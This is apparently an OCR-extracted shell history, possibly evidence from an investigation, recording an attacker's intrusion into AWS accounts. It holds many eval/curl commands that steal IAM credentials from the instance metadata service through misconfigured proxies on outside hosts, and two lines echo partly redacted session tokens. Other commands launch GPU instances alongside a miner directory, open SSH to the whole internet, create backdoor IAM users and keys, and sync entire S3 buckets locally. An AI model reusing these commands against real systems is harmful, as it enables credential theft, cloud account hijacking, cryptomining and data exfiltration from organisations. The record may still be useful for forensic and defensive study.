7345 aws ec2 run-instances --help
7346 aws ec2 run-instances help
7347 aws ec2 describe-subnets
7348 aws ec2 describe-subnets --region us-west-2
7349 aws ec2 create-subnet --region us-west-2
7350 aws ec2 create-subnet --region us-west-2 --vpc-id vpc-
                                                                          20ae --cidr-block 10.0.0.0/16
7351 aws ec2 run-instances --region us-west-2 --instance-type ps.ioxiarge --count 2 --image-id
ami-
                 8109 --associate-public-ip-address --security-group-ids sg-
                                                                                         5076
--instance-initiated-shutdown-behavior terminate --key-name default
7352 aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-
                 8109 --associate-public-ip-address --security-group-ids sg-
                                                                                         5076
--instance-initiated-shutdown-behavior terminate --key-name default --subnet-id subnet-
                                                                                                    5b37
7353 aws ec2 create-key-pair default
7354 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.94.236.99:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7355 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.94.236.99:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7356 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://3.86.119.211:443 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
7357 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://18.195.126.53:443
                                                                                        l awssession.sh`
http://169.254.169.254/latest/meta-data/iam/security-credentials/
7359 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
```

```
https://54.245.71.151:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
  l awssession.sh`
7360 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.154.221.171:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7361 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://35.171.245.38:8001
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                            awssession.sh`
7362 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.59.31.162:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/ | awssession.sh`
7363 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.59.31.162:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7364 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.59.31.162:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7365 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.239.8.193:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials
l awssession.sh`
7366 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.239.8.193:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7367 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://3.121.222.33:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7368 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://3.121.222.33:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials
l awssession.sh`
7369 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.56.194.127:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
| awssession.sh`
7370 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.56.194.127:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
7371 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.14.4.16:8080
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                      awssession.sh`
7372 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.14.4.16:8000
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                        | awssession.sh`
```

```
7373 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://99.80.218.255:8888 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7374 aws ec2 authorize-security-group-ingress --group-id sg 18e8 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
7375 aws ec2 create-key-pair --key-name default --region us-west-2
7377 aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 2 --image-id
                 8109 --associate-public-ip-address --security-group-ids sg-
ami
--instance-initiated-shutdown-behavior terminate --key-name default
7378 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.40.32.112:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials
| awssession.sh`
7379 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.210.6.139:443 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
7380 aws ec2 create-key-pair --key-name default
7381 aws ec2 describe-security-groups --region eu-west-1
7382 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                  00c8 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region eu-west-1
7385 aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 2 --image-id
                4a80 --associate-public-ip-address --security-group-ids sg-
ami
--instance-initiated-shutdown-behavior terminate --key-name default
7386 aws ec2 run-instances --region eu-west-1 --instance-type p3.8xlarge --count 2 --image-id
ami
                4a80 --associate-public-ip-address --security-group-ids sg-
                                                                               30c8
--instance-initiated-shutdown-behavior terminate --key-name default
7387 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.82.206.182:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7388 aws ec2 create-key-pair --key-name default --region eu-west-1
7389 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.208.142.204:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7390 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.230.72.193:8118 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7391 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.208.169.169:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
7392 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
```

```
http://54.168.64.184:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                       awssession.sh`
7393 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.74.132.51:3000
                                                                                          awssession.sh`
http://169.254.169.254/latest/meta-data/iam/security-credentials
7397 eval `echo '{\n "Code" : "Success",\n "LastUpdated" : "2019-04-19T05:11:57Z",\n
                                                                                          "Type":
         ",\n "AccessKeyId" : "
                                               \MFMO",\n "SecretAccessKey" :
                                     /1Cy",\n "Token":
"AgoJb3JpZ2luX2VjEH0aDmFwLXNvdXRoZWFzdC0xIkgwRgIhALHtoOReWr6UrR3uzGlSOvzcycqPDKW5x1buiIP2LcBXAiEAt9aNjJGjqj
Lmr3jYC1H03dxGr5Dt9QWRmuEEjjoVDcgqyQMIVhABGgw5MzMyMTA2NTgxMDMiDJu37d4+UPde3UY75yqmA3aMkZDVIiioaTCHx27IbUBzM
q1NYidADUUr54FfRkCubBqf0+anq+hkpkIpHGkG//JTctgQL/T500+65cicvagKU71xht0ecLUZZF38AvN+14kV4E/Sq9uDqM2ax7gWycaz
ib0UYhqQwhJ8uFNZ+GHVXYk7OOqvCZho5V+nLiZAPn1oTA0NknK/Ci9W9Eq1UvAgt2WG3rUDvQmAFV386mkV9e05QniI+A8rg2If1mxn/P8
RPttH9UMRVBqhc+uZxi0lqmoHmJ+507I4dbWeggiYWbJ6o6csjs2RCnY0kQ6S1nzC4eBFj83NxRcEALcCu3ZgfrhhZzXGH6dKPTFJhrSDXt
8JNjrSw/AAw/IERzH4N4KVEMK2ks8fwqaTDMgUhx16Jss0qDjTxNGbXSsRaOs4tcTJngvqC9HUzKMesS162R+FYGE9OYH+yP1VxPtWzUb86
qiOleYtOI7Miybjc33YMFR0HGJaTeGT4dkU/Zmue9P7ltGmJf9DFQ6rj53wqP9apMERvPMWDkGU+pZnIG30RINPEpklwnDfXN0sd0ljV7w6
TopgMP+w5eUFOrMBCMp1LVsNAr279ZZCKgYWCHhBEJKJXALeTOHoTuFzrR/9r6qP50xtSgCrF9vTJUWo3xy5XhjoCEYSY+m/39bRHgIKqIR
JMGO6zDEZ1zrqTvv8MZWl9oHNyxb2oZNdiYQG+l/RrPsYJPauSxiiyArmqrv42JcZzdHbtiYvyDCyfEeaM349jiSUd2IBriEj1yrBjijyWx
47BoI717DrKBH7WvXLmZp8FFg9XR1x/QKbVszMsGQ=",\n "Expiration": "2019-04-19T11:44:46Z"\n}' | awssession.sh`
7398 aws ec2 create-key-pair --region us-east-2
7401 aws ec2 authorize-security-group-ingress --group-id sg- 16fd --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-east-2
7402 aws ec2 run-instances --region us-east-2 --instance-type p3.16xlarge --count 2 --image-id
                d806 --associate-public-ip-address --security-group-ids sg-
ami-
--instance-initiated-shutdown-behavior terminate --key-name default
7403 aws ec2 run-instances --region us-east-2 --instance-type p3.8xlarge --count 2 --image-id
                 d806 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
7404 aws ec2 run-instances --region us-east-2 --instance-type p3.2xlarge --count 2 --image-id
                 d806 --associate-public-ip-address --security-group-ids sg-
ami-
                                                                                46fd
--instance-initiated-shutdown-behavior terminate --key-name default
7417 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.237.73.221:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
7418 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.208.175.152:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7419 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.19.223.190:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
```

```
7421 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.19.223.190:443 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
7422 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.154.85.105:443
                                                                                      | awssession.sh`
http://169.254.169.254/latest/meta-data/iam/security-credentials
7424 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout z --proxy
https://54.154.85.105:443 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
7425 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.50.100.208:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7426 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.54.243.27:44550
http://169.254.169.254/latest/meta-data/iam/security-credentials,
                                                                                      awssession.sh`
7427 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.32.45.175:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
7431 eval `echo '{\n "Code" : "Success",\n "LastUpdated" : "2019-04-19T06:03:31Z",\n "Type" :
                                               FEMZ",\n "SecretAccessKev" :
         ",\n "AccessKeyId" : "/
                                     bEVa",\n
                                              "Token" :
"AgoJb3JpZ2luX2VjEH4aCXVzLXdlc3OtMiJGMEQCIFf4P+TzZ5iUKgzG/BpxHnv5LgGbur9wbs7l1BC4nENRAiAHBkIvCT8EaZlhGfRkAZ
VGKu9iBtmYT7DbFOpASi1ZKiraAwhXEAAaDDExNjc5MzUzNDgzNyIMJZn0crlk/POLzHG+KrcDkFcMX7ju28j4jvPIHjxP8+4tH6D2u64oL
FANOO/tOBFwzAMDSzRLkc5eYF0pSfLp8sdPs9u0rpuIxqLGjAij7v0qqw6c1Wi1HUMkSRXfc3mf99ytNUe37wa1dMwTGB4GSoJ9WSgdbwOD
oHOgGAFvZAlaVCm3sVXhnUCZ/RAOCYxOpUXNTn2IrzT53UIwy8ZYhRARSgEXcaRiEGcf4d7IgHiChYmt6znwiZ2Sg20aidGw0skYMXWFrni
LlzOdTt3pFSn9bRo5REvQHo9Gsp51Viyhm/Lfr7y4n3latQTZgpGB+gKJfRoNDbK7PzSggB148wnHoLmBJcmyi4XTD9CZnY/G5IX2xAPvp4
FZzZX+FNgOdfO6F2tizOl3eU4K4XemtDG/jQqWn3TvI4tjylZuiCt9kJBbnyAPudOyrY85KRN43jUip3Zho2RTmY9U3NFCSOXKm/EIhWwND
zpmMN/Rh0MtzTGIa9Dp12W9OR6beqWmgBUFXFVNQZp1shp2BuTR+q+jfG7ga9ZX+mFv/EbFXxcvgffgSvS+TdkUCKGGqeegqopBv8cZR+Xs
zyUgVFnE9/Ha6ZLeIjDJyeXlBTq1ASbBmtg35Fd8yLSJRHJ5DrvGjjIDV/OzyWlDuTaHq/MLI9D7s8nYwT5HIpBkW24ijuOBWTL2S0GQQB+
ViU7/xXGRrRntqBBrKTogb5hWcYwo5bTEwssRqSukLhdHuYsbEMVeACSmWfwQb9+AUdo+yoSVoGzyAd3Td4RZwKsrgisLRQMaHP/+rb20qd
y0DrxjLHJfl0hvFJy8Z2SyzmPm3/L2g1gCeKZVPuViylio7mMFXeKpUf4=",\n "Expiration": "2019-04-19T12:30:17Z"\n}' |
awssession.sh`
7435 less /home/erratic/awsscan.txt
7436 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.223.34.247:1080 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7439 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.64.4.79:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
```

```
7440 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://34.248.37.105:8888
                                                                                      awssession.sh`
http://169.254.169.254/latest/meta-data/iam/security-credentials
7441 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxv
http://13.115.38.138:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7443 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://18.185.4.69:443 http://169.254.169.254/latest/meta-data/iam/security-credentials,
awssession.sh`
7444 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.164.114.241:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                            awssession.sh`
7445 aws ec2 create-key-pair --key-name default
7454 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.52.44.117:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7455 aws ec2 authorize-security-group-ingress --group-id sg- 7431 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
7456 aws ec2 create-key-pair --region us-west-2 --key-name default
7459 aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
                 3109 --associate-public-ip-address --security-group-ids sg-
ami
--instance-initiated-shutdown-behavior terminate --key-name default
7460 aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
                 8109 --associate-public-ip-address --security-group-ids sg-
ami-
--instance-initiated-shutdown-behavior terminate --key-name default
7461 aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 2 --image-id
                 8109 --associate-public-ip-address --security-group-ids sg-
ami
--instance-initiated-shutdown-behavior terminate --key-name default
7462 aws ec2 run-instances --region us-west-2 --instance-type p3.2xlarge --count 2 --image-id
                8109 --associate-public-ip-address --security-group-ids sg-
ami
                                                                               7431
--instance-ınıtıated-shutdown-behavior terminate --key-name default
7463 aws ec2 describe-instances --region us-west-2 | jq -r '.Reservations | .[] | .Instances | .[] |
.PublicIpAddress'
7475 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.67.90.165:443 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
                                                                5404 --protocol tcp --port 22 --cidr
7479 aws ec2 authorize-security-group-ingress --group-id sg-
```

```
0.0.0.0/0 --region us-east-2
7480 aws ec2 run-instances --region us-east-2 --instance-type p3.16xlarge --count 2 --image-id
                 d806 --associate-public-ip-address --security-group-ids sg-
ami
--instance-initiated-shutdown-behavior terminate --key-name default
7481 aws ec2 run-instances --region us-east-2 --instance-type p3.8xlarge --count 2 --image-id
ami
                 d806 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
7482 aws ec2 run-instances --region us-east-2 --instance-type p3.2xlarge --count 2 --image-id
                d806 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
7495 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.30.163.228:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7496 aws ec2 describe-instances eu-west-1
7497 aws ec2 describe-instances --region eu-west-1
7498 aws ec2 describe-instances --region us-east-2
7499 aws ec2 create-key-pair --region us-east-2 --key-name default
7502 aws ec2 describe-security-groups --region us-east-2
                                                                f45c --protocol tcp --port 22 --cidr
7503 aws ec2 authorize-security-group-ingress --group-id sg-
0.0.0.0/0 --region us-east-2
7504 aws ec2 run-instances --region us-east-2 --instance-type p3.16xlarge --count 2 --image-id
                5d806 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
7505 aws ec2 run-instances --region us-east-2 --instance-type p3.8xlarge --count 2 --image-id
ami
                 d806 --associate-public-ip-address --security-group-ids sg
                                                                               f45c
--instance-initiated-shutdown-behavior terminate --key-name default
7506 aws ec2 run-instances --region us-east-2 --instance-type p3.2xlarge --count 2 --image-id
ami-
                 d806 --associate-public-ip-address --security-group-ids sg- f45c
--instance-initiated-shutdown-behavior terminate --key-name default
7507 aws ec2 describe-instances --region us-east-2 | jq -r '.Reservations | .[] | .Instances | .[] |
.PublicIpAddress'
7605 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.79.116.117:3128 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh
7606 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.79.116.117:3128 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
7607 aws iam create-user
7608 aws iam create-user --user-name default
```

```
7609 aws iam list-groups
7610 aws iam list-user-policy
7611 aws iam list-user-policies
7612 aws iam list-user-policies --user-name
7613 aws iam list-user-policies --user-name
7614 aws iam list-user-policies --user-name
7615 aws iam create-access-key
7616 aws iam create-access-key --user-name default
7617 aws iam attach-user-policy --user-name default --policy-arn
arn:aws:iam::aws:
7618 aws iam list-policies
7619 aws iam list-policies | less
7620 aws iam attach-user-policy --user-name default --policy-arn
"arn:aws:iam::aws:
7621 aws iam list-user-policies --user-name default
7622 aws iam put-user-policy
7626 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.215.118.42:443
http://169.254.169.254/latest/meta-data/iam/security-credentials,
awssession.sh`
7627 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.113.12.133:80 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
7628 aws iam put-user-policy --user-name default --policy-name
file://
7629 evar curr -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.254.186.54:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7630 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.154.89.46:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7631 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.17.209.16:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/sec
                                                                                           awssession.sh`
7632 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.199.172.190:443
                                                                                        awssession.sh`
http://169.254.169.254/latest/meta-data/iam/security-credentials/
7633 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
```

```
https://52.213.150.35:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7634 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://34.250.209.203:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                            awssession.sh`
7635 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://18.208.62.195:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7636 aws iam create-user --user-name default
7637 aws iam create-access-key --user-name default\n
7638 aws iam put-user-policy --user-name default --
file:///mnt/
7639 aws iam list-users
7640 aws --profile
                               iam list-users
7641 nano ~/.aws/credentials
7642 aws --profile
                                   iam list-users
7643 aws --profile
                                   iam list-buckets
7644 aws --profile
                                   s3api list-buckets
7645 aws
7646 aws
                         describe-account
7647 aws
                         describe-organization
7648 aws
                describe-organization
7649 aws --profile
                                        describe-organization
7650 aws --profile
                                   organizations describe-organization
                           organizations describe-organization
7651 aws --profile
7652 aws --profile
                                       s3api list-buckets
7653 aws
                      s3api list-buckets
                             s3api list-buckets
7654 aws --profile
7734 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "S3")
7735 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "S3")'
7736 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "EC2") | "\"" + .ip_prefix + "\", "' | tr '\n' ' '
7737 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "33") | "\"" + .ip_prefix + "\", "'
7738 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "S3") | "\"" + .ip prefix + "\", "'
```

```
7739 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "S3") | .ip prefix '
7744 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "S3") | .ip prefix ' | parallel ./spools3.sh {}
7762 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://35.156.78.99:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7763 aws ec2 describe-instances --region us-east-1
7764 aws ec2 describe-security-groups --region us-east-2
7765 aws ec2 describe-security-groups --region us-west-2
7766 aws ec2 describe-security-groups --region eu-west-2
7768 cd aws scan/miner
7799 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://35.162.65.136:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7955 cat aws scan/scan_for_metadata.sh
8054 cat ~/aws scan/scan for metadata.sh
8055 cat ~/aws scan/prescan.sh
8205 cp ../aws scan/new all.xz .
8226 eval `curl --fail -L -k -s --proxy-insecure --proxy http://13.209.82.3:8008
http://169.254.169.254/latest/meta-data/iam/security-credentials
                                                                       | awssession.sh`
8229 eval `curl --fail -L -k -s --proxy-insecure --proxy http://18.231.118.35:9050
http://169.254.169.254/latest/meta-data/iam/security-credentials/
8232 eval curl --fail -L -k -s --proxy-insecure --proxy http://18.231.118.35:9050
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                    awssession.sh`
8233 eval `curl --fail -L -k -s --proxy-insecure --proxy http://18.231.118.35:9050
http://169.254.169.254/latest/meta-data/iam/security-credentials/
8236 eval `curl --fail -L -k -s --proxy-insecure --proxy https://63.32.127.100:443
http://169.254.169.254/latest/meta-data/iam/security-credentials,
awssession.sh`
8237 aws s3 list-buckets
                                                                                                      '' \;
8239 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='
mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws
                                                                                                      '' \;
8240 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='
mkdir -p \" \dir \) \" \dir \) \" \dir \) \" \dir \) \
                                                                                                     '' \;
8241 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='
mkdir -p \" \dir \) \" \&\ \cd \" \dir \) \" \&\ \s3 \ sync \ s3://{} .
8278 cp ../aws_scan/spool.sh .
8398 aws ec2 describe-instances --region eu-west-2
```

```
8399 aws ec2 describe-instances --region eu-north-1
8400 aws ec2 describe-instances --region ap-north-1 --profile
8401 aws ec2 describe-instances --region eu-north-1 --profile
8402 aws ec2 describe-instances --region eu-north-1 --profile
8403 aws ec2 describe-instances --region eu-north-1 --profile
8404 aws ec2 describe-instances --region eu-north-1 --profile
8406 aws ec2 describe-instances --profile
                                                     --region eu-north-1 --instance-ids
8407 aws ec2 reboot-instances --profile
              d2ea
                                                       --region eu-north-1
8436 aws ec2 describe-instances --profile
                                                 describe-instances
8500 aws --profile
                         --region us-west-2
                                                     get-account-limit
8501 aws --profile
                          --region us-west-2
8502 aws --profile
                          --region us-west-2
                                                            register-domain
8526 curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy http://13.124.194.79:8888
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                           awssession.sh
8527 eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
http://13.124.194.79:8888 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
8528 for x in $(cat iam.txt); do\neval `$x | awssession.sh`;\naws ec2 describe-key-pairs\ndone
8529 for x in $(cat iam.txt); do\neval `./$x | awssession.sh`;\naws ec2 describe-key-pairs\ndone
8530 for x in $(cat iam.txt); do\neval `exec $x | awssession.sh`;\naws ec2 describe-key-pairs\ndone
8531 nano ../aws scan/n
8544 aws ec2 describe-key-pairs
8548 curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy http://13.211.238.144:4455
http://169.254.169.254/latest/meta-data/iam/security-credentials,
                                                                          awssession.sh
8549 aws sts get-caller-identity --verbose
8550 aws --help
8553 curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy https://63.32.127.100:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh
8554 aws --debug sts get-caller-identity
8558 nano ~/.aws/config
8559 cd ~/.aws
8560 mv .aws .aws.bak
8561 aws help
                                get-caller-identity
8562 aws --no-sign-request
              get-caller-identity --region ap-southeast-2
8563 aws
8565 eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
http://13.211.238.144:4455 http://169.254.169.254/latest/meta-data/iam/security-credentials/
```

```
awssession.sh`
8566 eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
https://63.32.127.100:443
http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
8641 eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
http://35.157.236.93:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
 8642 eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
http://35.157.236.93:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials
                   l awssession.sh`
 8643 aws ec2 describe-instances
8646 eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
http://52.52.27.18:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
 8647 eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
http://52.52.27.18:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
                    awssession.sh`
 8649 eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
http://54.173.72.185:3000
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                | awssession.sh`\n
8650 aws ec2 describe-instances --region us-west-2
 8651 aws s3api list-buckets
 8653 eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
https://18.195.126.53:443
http://169.254.169.254/latest/meta-data/iam/security-credentials
                l awssession.sh`\n
               get-caller-identity
 8654 aws
 8655 aws s3api list-buckets
 8656 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='
                                                                                                            \;
mkdir -p \" \dir \) \" \end{array} \ .
 8704 cd aws
 8705 cd aws dumps
 8782 less
 8820 mv .aws.bak .aws
 8821 cat .aws/credentials
 8822 aws --profile
                                         describe-instances --region us-east-1
8823 aws --profile
                             describe-instances --region us-east-1
```

```
8824 aws --profile
